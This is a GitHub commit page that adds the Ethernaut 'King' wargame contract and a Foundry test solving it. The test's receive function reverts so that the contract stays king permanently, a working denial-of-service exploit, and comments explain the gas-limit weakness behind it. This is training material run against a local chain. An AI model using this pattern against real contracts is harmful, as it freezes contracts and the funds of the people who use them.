-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
0xHUANG
authored and
0xHUANG
committed
Jan 19, 2025
1 parent
d50db9d
commit e28215a
Showing
2 changed files
with
76 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,35 @@ | ||
| // SPDX-License-Identifier: MIT | ||
| pragma solidity ^0.8.0; | ||
|
|
||
|
|
||
| /* | ||
| Author: @BoscoHuang | ||
| Process: | ||
| - Deploy Token contract in anvil: | ||
| 0. anvil | ||
| 1. forge create src/09_king.sol:King --rpc-url http://127.0.0.1:8545 --private-key 0xac0974bec39a17e36ba4a6b4d238ff944bacb478cbed5efcae784d7bf4f2ff80 | ||
| */ | ||
|
|
||
| contract King { | ||
| address king; | ||
| uint256 public prize; | ||
| address public owner; | ||
|
|
||
| constructor() payable { | ||
| owner = msg.sender; | ||
| king = msg.sender; | ||
| prize = msg.value; | ||
| } | ||
|
|
||
| receive() external payable { | ||
| require(msg.value >= prize || msg.sender == owner); | ||
| payable(king).transfer(msg.value); | ||
| king = msg.sender; | ||
| prize = msg.value; | ||
| } | ||
|
|
||
| function _king() public view returns (address) { | ||
| return king; | ||
| } | ||
| } |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,41 @@ | ||
| // SPDX-License-Identifier: MIT | ||
| pragma solidity ^0.8.0; | ||
|
|
||
| import "ds-test/test.sol"; | ||
| import "forge-std/Test.sol"; | ||
| import "../src/09_King.sol"; | ||
|
|
||
| /* | ||
| Author: @BoscoHuang | ||
| Analysis: | ||
| - transfer gas limit is 2300 | ||
| - the attack contract don't have recieve/fallback function, will block the transfer | ||
| - or the attack contract has recieve/fallback function, but has the code in these funciton, willl trigger out of gas. | ||
| Command: | ||
| - forge test --match-contract KingTest --fork-url http://127.0.0.1:8545 -vvv | ||
| */ | ||
|
|
||
| contract KingTest is DSTest { | ||
| King Ethernaut09; | ||
|
|
||
| function setUp() public { | ||
| Ethernaut09 = King(payable(0x5FbDB2315678afecb367f032d93F642f64180aa3)); | ||
| } | ||
|
|
||
| function testEthernaut09() public { | ||
| address(Ethernaut09).call{value: Ethernaut09.prize()}(""); | ||
| console.log("New king: ", Ethernaut09._king()); | ||
| assert(address(this) == Ethernaut09._king()); | ||
|
|
||
| (bool success, ) = address(Ethernaut09).call{value: Ethernaut09.prize()}(""); | ||
| console.log("New King Claims: ", success); | ||
| } | ||
|
|
||
| receive() external payable { | ||
| revert("You can't defeat me"); | ||
| } | ||
|
|
||
| } |